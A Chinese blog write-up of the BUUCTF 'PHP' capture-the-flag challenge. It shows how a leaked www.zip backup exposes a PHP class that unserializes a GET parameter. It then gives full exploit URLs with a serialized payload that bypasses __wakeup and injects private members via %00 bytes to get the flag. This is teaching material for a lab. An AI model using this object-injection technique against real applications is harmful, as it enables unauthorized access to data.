[极客大挑战 2019]PHP

已于 2022-03-13 16:20:35 修改
阅读量547 收藏
点赞数 1
分类专栏: 题目wp 文章标签: php linux 开发语言
于 2022-03-13 16:20:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62092622/article/details/123441780
版权

建议先看一下这篇文章,了解一下序列化与反序列化,然后再写题

https://www.jb51.net/article/188446.htmhttps://www.jb51.net/article/188446.htm打开是一个小猫

看到提示是备份网站,拿扫描工具(我用的是Kali的dirsearch)找一找,发现一个www.zip文件(其实我发现了很多文件,看wp都是www.zip但我不明白那么多为什么就看这个)

查看文件

 自动下载了压缩包

 解压后发现一些文件

flag.php

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

index.php(只列出重要的一部分)

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

可以看出本题和反序列化有关,而且当username=admin并且password=100时会出现flag

构造payload(记得把属性个数改成3来绕过__wakeup)

http://bb9b2df6-6dee-49e8-9cb8-7096f17bdc9e.node4.buuoj.cn:81?select=O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

但是却出现这个,说明我们的参数并没有传进去

 后来才得知,url识别不了双引号,直接进行url编码比较方便,下面网址点击即可进行编码

在线URL编码解码工具-UrlEncode编码-UrlDecode解码在线工具

因为Name成员是private,所以要在类名和成员名前加上%00

最终payload

http://bb9b2df6-6dee-49e8-9cb8-7096f17bdc9e.node4.buuoj.cn:81?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

得到flag

-眼里有星河-
关注
专栏目录
【网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 5142
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
极客挑战 2019 PHP
BlueDoorZz的博客
07-12 497
0x00 题型:源码泄露,php反序列化,wakeup方法的绕过。 0x01 提示网站有备份,直接在url后面拼接www.zip,下载到源码。主要代码如下: <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> <?php include 'flag.php'; error_reporting(0); class Name{
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 660
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 331
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
buuctf 极客挑战2019php
最新发布
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...
[极客挑战 2019]PHP 1
weixin_45577185的博客
06-16 389
用dirsearch-master扫描网站: 发现了www.zip,在网址后面加/www.zip,下载www.zip 然后解压发现: 挨个文件打开,发现flag.php里的flag是假的,然后发现class.php文件中: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; pub.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值